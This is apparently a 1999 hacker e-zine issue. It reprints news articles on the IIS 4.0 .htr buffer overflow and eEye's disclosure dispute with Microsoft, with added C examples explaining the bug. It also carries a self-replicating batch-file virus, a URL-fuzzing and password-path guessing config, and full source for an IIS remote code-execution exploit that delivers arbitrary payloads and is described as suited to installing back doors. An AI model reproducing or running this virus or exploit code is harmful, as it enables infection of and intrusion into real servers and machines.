@echo off>nul.virii
if exist %0.bat set virii=%0.bat
if exist %0 set virii=%0
if !%1==! goto virii_start
if %1==/infect goto virii_infect
if %1==/find goto virii_find
:virii_start
REM Will find all batch files in current directory
echo Finding files to infect with virii
for %%a in (*.bat) do command /e:10000 /c %virii% /infect %%a
goto virii_end
:virii_infect
:virii_find
REM This part makes sure virii does not infect itself or
REM previously infected files (/find only reports, /infect goes on)
echo Checking %2 and making sure it has not been previously infected
set file_virii=%0
REM %%0 reaches find as a literal percent-zero, so only the virii marker line
REM of an infected host matches, never this find line itself
find "file_virii=%%0" <%2 >viriix.bat
call viriix
del viriix.bat
if "%file_virii%"=="viriix" echo %2 is already infected with virii
if "%file_virii%"=="viriix" goto virii_end
if "%1"=="/find" echo %2 is not infected with virii
if "%1"=="/find" goto virii_end
REM End of check
echo The virii is now infecting %2
type %2 > viriix.bat
echo REM virii>> viriix.bat
find "virii" <%virii% >> viriix.bat
REM Write the extended copy back over the host so the virii travels with it
copy viriix.bat %2 >nul
del viriix.bat
goto virii_end
:virii_end
I don't know what use this could be apart from an example of
redirecting outputs and "for" commands.
[)igital^[)istortion
ICQ 34585986
------------------------------
<!-- 4.00 - ISS Portfolio //-->
4.01 --=\\wired.com\\=--
[www.wired.com]
A major security flaw in a Microsoft Web server could allow crackers to take complete
control of e-commerce Web sites, security experts warned Tuesday.
The flaw in Microsoft's Internet Information Server 4.0 allows unauthorized remote
users to gain system-level access to the server, according to Firas Bushnaq, CEO of
eEye <http://www.eeye.com/>, the Internet security firm that discovered it.
"This hole is so serious it's scary," said Jim Blake, a network administrator for
Irvine, a city in southern California.
"With other [Windows NT] security holes, crackers have needed to gain some level of
user access before executing code on the server. This is different.... Anybody off the
Web can crack IIS," he said.
More than 1.3 million Microsoft IIS servers are up and running on the Web. Nasdaq, Walt
Disney, and Compaq are among the larger e-commerce operations run off the server,
according to NetCraft <http://www.NetCraft.com/> Internet surveys.
Microsoft confirmed that the problem exists and said that it is working on a fix.
Customers, however, have not been notified.
"Normally we will post the problem and the bug fix at the same time," said Microsoft
spokeswoman Jennifer Todd. "We take these security issues very seriously, and the patch
will be available [soon]."
The fix will be posted to Microsoft's security Web site
<http://www.microsoft.com/security/>, "probably in the next couple of days," Todd said.
The exploit is just one of a long list of security flaws affecting IIS 4.0. In May,
security experts found an exploit
<http://r.wired.com/r/10025/http://www.wired.com/news/news/technology/story/19566.html>
that enabled crackers to gain read access to files held on IIS when they requested
certain text files.
Last summer, an exploit known as the $DATA Bug
<http://r.wired.com/r/10025/http://www.wired.com/news/news/technology/story/13426.html>
granted any non-technical Web users access to sensitive information within the source
code used in Microsoft's Active Server Page, which is used on IIS.
And in January, a similar IIS security hole
<http://r.wired.com/r/10025/http://www.wired.com/news/news/technology/story/10136.html>
was discovered, one that exposed the source code and certain system settings of files
on Windows NT-based Web servers.
But the latest problem appears to be the most serious because of the level of access it
reportedly allows.
"The exploit gives crackers access to any database or software residing on the Web
server machine," said Bushnaq. "So they could steal credit-card information or even
post counterfeit Web pages."
For instance, crackers could exploit the bug to modify stock prices at one of the many
news and stock information sites running IIS.
The hole allows remote users to gain control of an IIS 4.0 server by creating what is
known as a "buffer overflow" on .htr Web pages -- an IIS feature designed to enable
users to remotely change their passwords.
A buffer overflow can occur when a system is fed a value much larger than expected. In
the case of the bug, the Dynamic Link Library (DLL) governing the .htr file extension,
called ISM.DLL, can be overloaded by running a utility that loads too many characters
into the library.
Once overloaded, the DLL is disabled and the content of the overflow "bleeds" into the
system.
"Normally, this would just crash the system," said Space Rogue, a member of L0pht Heavy
Industries, <http://www.l0pht.com/> an independent security consulting firm that last
year testified before the United States Senate on government information security.
"But a good cracker can write an exploit where the data that overflows will actually be
an executable program that will run as machine code," said Space Rogue. Such a move
could give a cracker complete control of the target system.
The overflow executable program can be used to run a system-level program that will
deliver the equivalent of a DOS command window to an attacker's PC.
To demonstrate the hole, eEye wrote a program called IIS Hack that will enable users to
crack and execute code on any IIS 4.0 Web Server.
However, disabling or removing the .htr password utility will not fix the problem,
according to Bushnaq. "You have got to go through a series of steps to remove the
faulty [code]."
eEye discovered the problem while beta testing a network security auditing tool.
"Remote exploits are about the most serious problems you can have with a Web server,"
said Space Rogue. "It gives the attacker root privileges, so the cracker not only has
access to the IIS server but [to] software running on that machine."
"In many corporate sites today, this will give the cracker access to the entire
network."
eEye is a software development firm specializing in security audit tools. Chief
executive Bushnaq previously founded the electronic commerce site ECompany.com
<http://www.ecompany.com/>.
http://www.wired.com/news/news/technology/story/20231.html
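The overflow the article above describes, reduced to its shape in C. This is an added example, not eEye's IIS Hack tool and not Microsoft's ISM.DLL code: the 256-byte buffer, the request-line parser and every function name here are assumptions made for illustration, since the page gives neither the real buffer size nor the real handler. It puts the unchecked copy beside the bounded one, and builds a constructed oversize .htr request of the kind the article mentions to show the bounded version refusing it.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative size of the fixed stack buffer the handler copies the
 * request target into. Assumed for this example only; the page does not
 * give ISM.DLL's real buffer size. */
#define TARGET_BUF 256

/* Vulnerable shape: the request target is extracted with an unbounded %s
 * straight into a fixed stack buffer. Any target longer than TARGET_BUF-1
 * bytes runs past the buffer into the saved frame pointer and return
 * address, which is what an attacker-chosen oversize URL overwrites.
 * Shown for contrast only; never call it on untrusted input. */
void parse_target_unchecked(const char *line)
{
    char method[16];
    char target[TARGET_BUF];
    if (sscanf(line, "%15s %s", method, target) == 2)   /* no width on %s */
        printf("%s %s\n", method, target);
}

/* Hardened shape: measure the target first, refuse it if it does not fit,
 * and only then copy exactly that many bytes. Returns 0 on success, -1 for
 * a malformed line or an oversize target (refuse, never silently truncate). */
int parse_target_checked(const char *line, char *out, size_t outsz)
{
    const char *start = strchr(line, ' ');
    const char *end;
    size_t n;
    if (start == NULL)
        return -1;
    start++;
    end = strpbrk(start, " \r\n");
    n = end ? (size_t)(end - start) : strlen(start);
    if (n == 0 || outsz == 0 || n >= outsz)
        return -1;
    memcpy(out, start, n);
    out[n] = '\0';
    return 0;
}

/* Convenience wrapper: returns the parsed target from a static buffer, or
 * NULL when parse_target_checked() refuses the line. */
const char *checked_target(const char *line)
{
    static char target[TARGET_BUF];
    return parse_target_checked(line, target, sizeof target) == 0 ? target : NULL;
}

/* Does the target end in .htr, the extension IIS hands to ISM.DLL? */
int is_htr_target(const char *target)
{
    size_t n = strlen(target);
    return n >= 4 && strcmp(target + n - 4, ".htr") == 0;
}

/* Constructed sample request: a run of `fill` 'A' bytes before ".htr", in
 * the shape of the oversize URL the article mentions. Returns a static
 * buffer; fill is capped so the request always fits inside it. */
const char *oversize_htr_request(size_t fill)
{
    static char req[4096];
    const char *tail = ".htr HTTP/1.0\r\n\r\n";
    size_t max_fill = sizeof req - strlen("GET /") - strlen(tail) - 1;
    if (fill > max_fill)
        fill = max_fill;
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', fill);
    strcpy(req + 5 + fill, tail);
    return req;
}

int main(void)
{
    const char *benign = "GET /change.htr HTTP/1.0\r\n\r\n";
    const char *t = checked_target(benign);
    printf("benign: %s (htr=%d)\n", t ? t : "(refused)", t ? is_htr_target(t) : 0);
    printf("oversize: %s\n",
           checked_target(oversize_htr_request(3000)) ? "accepted" : "refused");
    return 0;
}
```

The point of the checked version is that it refuses rather than truncates: a handler that silently cut the target to fit would no longer crash, but it would serve the wrong resource, so the bound is a rejection, not a clamp.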
------------------------------
4.02 --=\\infoworld.com\\=--
[www.infoworld.com]
A small security consulting firm traded punches with Microsoft
this week over how to publicize a security flaw in Microsoft's Web
server software. Microsoft posted an alert and workaround June 15,
after the other company, eEye, posted a way to exploit the flaw,
saying it was necessary to draw attention to the threat it poses.
"It was demonstrating how serious this is. Microsoft has not
responded to us since then," Firas Bushnaq, eEye CEO, said
Thursday.
Microsoft countered that it had been cooperating with eEye on the
problem until the other company broke Microsoft's policy of
publishing security warnings only once there is a remedy, so as
not to reveal a breach to would-be exploiters.
"Deliberately publishing a tool on one's Web site to let malicious
users hurt innocent people is not being part of the solution,"
Microsoft security product manager Scott Culp countered on
Thursday. "It is a mystery to us why [eEye] suddenly and abruptly
chose to stop working with us and take this public."
The flaw is a "buffer overflow" in Microsoft's Internet Information
Server (IIS) 4.0. This could allow junk or malicious code to
overwrite executable code, thereby making the Web server either
crash or execute unauthorized commands, Culp said.
Buffer overflows are caused by programmer error and are "very
common... one of the biggest of all network security problems,"
Bushnaq said.
The IIS 4.0 bug could give a hacker access to various data on the
targeted Web server, including access to company files or customer
information, depending on how the network is configured and which
break-in approach is used, Bushnaq added.
"It's a very, very serious problem that people need to fix as soon
as possible," Bushnaq said.
Officials at eEye notified Microsoft of the problem June 8, but
were frustrated by the lack of response during the next several
days, Bushnaq said. On Monday, June 14, the company decided to
make the problem public.
Since then, eEye has gotten hundreds of e-mail messages in favor
of its decision, compared to about four criticizing it, Bushnaq
said.
"The big issue now is that Microsoft's PR is [painting] eEye as a
company that's irresponsible and pointing to something bad,"
Bushnaq said.
But Culp said Microsoft's security team had been working intensively
with eEye, as it does with other companies and users that report
security problems. They had exchanged about 20 e-mail messages
last week, before eEye unilaterally decided to go public, he said.
"[Their decision] left a lot of people at risk ... compounded by
irresponsibly publishing that [exploitation] tool," Culp said.
Microsoft hopes to release the final patch very soon, Culp said.
In the meantime, the company is offering a workaround in its June
15 security bulletin, which can be found at
www.microsoft.com/security/bulletins/ms99-019.asp
eEye's patch can be found at
www.eeye.com/database/advisories/ad06081999/ad06081999-ogle.html
eEye, a unit of eCompany LLC, in Corona del Mar, Calif., is at
www.eeye.com. Microsoft Corp., in Redmond, Wash., is at
www.microsoft.com.
http://www.infoworld.com/cgi-bin/displayStory.pl?990617.hneeye.htm
------------------------------
4.03 --=\\iss_brain.ini.txt\\=--
[General]
Title=HTTP Miner
[Commands]
1=GET /%%$RPT(65,40,10)%%.%%extention%% HTTP/1.0
;2=GET /%%cgi-bin%%/%%passwordpath%%/%%passwordfile%%.%%extention%% HTTP/1.0
[Variables]
cgi-bin=cgi-bin,cgi,bin,cgibin,data,dat,exec,apps,secure,hide,
extention=htr,html,htx,asp,exe,xml,ini,txt,dat,dbf,lst,data,
passwordpath=password,passwords,pass,users,clients,admins,store,
passwordfile=password,passwords,pass,users,clients,admins,store,
c0=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c1=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c2=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c3=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c4=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c5=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c6=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c7=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c8=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
c9=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
e0=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
e1=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
e2=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,-,_,
------------------------------
4.04 --=\\iss_injector.c.txt\\=--
I read yesterday on eEye.com that they had discovered a buffer overflow in
IIS. I could not resist writing an exploit. I did not have time to design
a really cool payload for this exploit, so I simply wrote the injection
code. However, this is meaningful for several reasons. Attached is the
injection code. The exploit will deliver any payload of your choosing.
Your payload will be executed. This empowers you to create a "collection"
of payloads that are not dependent upon the injection vector in any way.
This decoupling is important for military needs, where a single injection
vector needs to work, but the "warhead" may be different depending on the
target's characterization.
The exploit was fairly simple to build. In short, I read on eEye.com that
they had overflowed IIS with something like a ~3000 character URL. Within
minutes I had caused IIS to crash with EIP under my control. I used a
special pattern in the buffer (see code) to make it easy for me to identify
where EIP was being popped from. The pattern also made it easy to
determine where I was jumping around. Use the tekneek Danielson. ;-)
So, I controlled EIP, but I needed to get back to my stack segment, of
course. This is old school, and I really lucked out. Pushed down two
levels on the stack was an address for my buffer. I couldn't have asked
for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could
return to. It had two pop's followed by a return. This made my injection
vector return to the value that was stored two layers down on the stack.
Bam, I was in my buffer. So, I landed in a weird place, had to add a near
jump to get to somewhere more useful.. nothing special, and here we are
with about 2K of payload space. If you don't supply any mobile code to be
run, the injection vector will supply some for you. The default payload is
simply a couple of no-ops followed by a debug breakpoint (interrupt 3)...
It's easy to play with if you want to build your own payloads.. just keep a
debugger attached to inetinfo.exe on the target machine.
Lastly, I would simply like to point out that monoculture installations are
very dangerous. It's a concept from agribusiness.. if you have all one
crop, and a virus comes along that can kill that crop, you're out of
business. With almost ALL of the IIS servers on the net being vulnerable
to this exploit, we also have a monoculture. And, it's not just IIS. The
backbone of the Internet is built on common router technology (such as
cisco IOS). If a serious exploit comes along for the IOS kernel, can you
imagine the darkness that will fall?
<--- snip
// IIS Injector for NT
// written by Greg Hoglund <hoglund@ieway.com>
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a number of different attack payloads. This code could be used, for
// example, by a military that needs to attack IIS servers, and has characterized
// the eligible hosts. The proper attack can be chosen depending on needs. Since
// the payload is so large with this injection vector, many options are available.
// First and foremost, virii can be delivered with ease. The payload is also plenty
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a
// very serious security problem.
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib, "wsock32.lib")
int main(int argc, char **argv)
{
    SOCKET s = 0;
    WSADATA wsaData;
    if(argc < 2)
    {
        fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \
                "http://www.rootkit.com\nUsage: %s <target" \
                "ip> <optional payload file>\n", argv[0]);
        exit(0);
    }
    WSAStartup(MAKEWORD(2,0), &wsaData);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(INVALID_SOCKET != s)
    {
        SOCKADDR_IN anAddr;
        memset(&anAddr, 0, sizeof(anAddr));
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(80);
        anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
        if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
        {
            static char theSploit[4096];
            int i;
            // fill pattern
            char kick = 'z'; //0x7a
            char place = 'A';
            // my uber sweet pattern gener@t0r
            for(i=0;i<4096;i+=4)
            {
                theSploit[i] = kick;
                theSploit[i+1] = place;
                theSploit[i+2] = place + 1;
                theSploit[i+3] = place + 2;
                if(++place == 'Y') // beyond 'XYZ'
                {
                    place = 'A';
                    if(--kick < 'a') kick = 'a';
                }
            }
            // "get /" is written without a terminator (count == length), so the
            // pattern bytes right after it stay in place
            _snprintf(theSploit, 5, "get /");
            _snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");
            // after crash, looks like inetinfo.exe is jumping to the address
            // stored @ location 'GHtG' (0x47744847)
            // cross reference back to the buffer pattern, looks like we need
            // to store our EIP into theSploit[598]
            // magic eip into NTDLL.DLL
            theSploit[598] = (char)0xF0;
            theSploit[599] = (char)0x8C;
            theSploit[600] = (char)0xF8;
            theSploit[601] = (char)0x77;
            // code I want to execute
            // will jump forward over the
            // embedded eip, taking us
            // directly to the payload
            theSploit[594] = (char)0x90; //nop
            theSploit[595] = (char)0xEB; //jmp
            theSploit[596] = (char)0x35; //
            theSploit[597] = (char)0x90; //nop
            // the payload. This code is executed remotely.
            // if no payload is supplied on the command line, then this default
            // payload is used. int 3 is the debug interrupt and
            // will cause your debugger to "breakpoint" gracefully.
            // upon examination you will find that you are sitting
            // directly in this code-payload.
            if(argc < 3)
            {
                theSploit[650] = (char) 0x90; //nop
                theSploit[651] = (char) 0x90; //nop
                theSploit[652] = (char) 0x90; //nop
                theSploit[653] = (char) 0x90; //nop
                theSploit[654] = (char) 0xCC; //int 3
                theSploit[655] = (char) 0xCC; //int 3
                theSploit[656] = (char) 0xCC; //int 3
                theSploit[657] = (char) 0xCC; //int 3
                theSploit[658] = (char) 0x90; //nop
                theSploit[659] = (char) 0x90; //nop
                theSploit[660] = (char) 0x90; //nop
                theSploit[661] = (char) 0x90; //nop
            }
            else
            {
                // send the user-supplied payload from
                // a file. Yes, that's a 2K buffer for
                // mobile code. Yes, that's big.
                FILE *in_file;
                in_file = fopen(argv[2], "rb");
                if(in_file)
                {
                    int offset = 650;
                    int c;
                    // test for EOF before storing the byte, so the EOF value
                    // fgetc() returns at end of file never lands in the payload
                    while( (offset < 3000) && ((c = fgetc(in_file)) != EOF) )
                    {
                        theSploit[offset++] = (char)c;
                    }
                    fclose(in_file);
                }
            }
            // the request runs from offset 0 through the blank line after
            // "HTTP/1.0", 3026 bytes in all; send that fixed length rather
            // than strlen(), so a payload containing a zero byte is not cut short
            send(s, theSploit, 3005 + (int)strlen("BBBB.htr HTTP/1.0\r\n\r\n"), 0);
        }
        closesocket(s);
    }
    WSACleanup();
    return 0;
}
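The marker-pattern trick from the post above, as an added example that is not Hoglund's code. It regenerates the injector's pattern with the same rules, turns the EIP value read off the crashed process into the buffer offset those four bytes were popped from, and computes where the two-byte short jump lands. The EIP value 0x47744847 and the offsets 595 and 0x35 are the ones quoted in the injector's comments, so the only assumption is the function naming.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define PATTERN_LEN 4096

/* Fill buf with the same marker pattern the injector uses: each 4-byte
 * group is [kick, place, place+1, place+2]; place runs 'A'..'X' (24 groups,
 * 96 bytes per cycle), then wraps to 'A' while kick steps down from 'z'.
 * kick is clamped at 'a', so groups stop being unique after 26 cycles. */
void make_pattern(unsigned char *buf, size_t len)
{
    unsigned char kick = 'z';
    unsigned char place = 'A';
    size_t i;
    for (i = 0; i + 4 <= len; i += 4) {
        buf[i]     = kick;
        buf[i + 1] = place;
        buf[i + 2] = (unsigned char)(place + 1);
        buf[i + 3] = (unsigned char)(place + 2);
        if (++place == 'Y') {
            place = 'A';
            if (--kick < 'a')
                kick = 'a';
        }
    }
}

/* Given the EIP value seen after the crash, return the offset in the
 * pattern of the four bytes that were loaded into it, or -1 if the value
 * did not come from the pattern. x86 is little-endian, so EIP 0x47744847
 * means the bytes "GHtG" sat in the overwritten return slot. Returns the
 * first match, which is only unambiguous inside the unique 2496 bytes. */
long pattern_offset(uint32_t eip)
{
    unsigned char pat[PATTERN_LEN];
    unsigned char needle[4];
    size_t i;
    make_pattern(pat, sizeof pat);
    needle[0] = (unsigned char)(eip & 0xff);
    needle[1] = (unsigned char)((eip >> 8) & 0xff);
    needle[2] = (unsigned char)((eip >> 16) & 0xff);
    needle[3] = (unsigned char)((eip >> 24) & 0xff);
    for (i = 0; i + 4 <= sizeof pat; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Offset an x86 short jump (EB rel8) lands on when its opcode sits at
 * buffer offset `at`: rel8 is a signed displacement from the end of the
 * 2-byte instruction, so the target is at + 2 + rel8. */
long short_jmp_target(long at, unsigned char rel8)
{
    int rel = rel8 >= 0x80 ? (int)rel8 - 256 : (int)rel8;
    return at + 2 + rel;
}

int main(void)
{
    printf("EIP 0x47744847 was popped from pattern offset %ld\n",
           pattern_offset(0x47744847u));
    printf("jmp short at offset 595 with rel8 0x35 lands at offset %ld\n",
           short_jmp_target(595, 0x35));
    return 0;
}
```

Run as-is it reports offset 598 and landing point 650, which are exactly the slots the injector fills with the NTDLL address and the default int 3 payload. Because kick stops at 'a', cycles 26 and beyond repeat cycle 25, so an EIP taken from past byte 2496 resolves to the earliest of several candidate offsets; for this injector that does not matter, since the overwritten slot is at 598.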
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
. Quote #3- .
. .
. "Hey anyone need an easy way to make $50?" .
. -JayPee .
. .
. Quote made up by Lord Oak. .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Please go to: www.thepoison.org/popup.html and click on our sponsors because we have to
pay the bills someway! It doesn't cost you anything (except 10 seconds) to go there and
click on it.
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.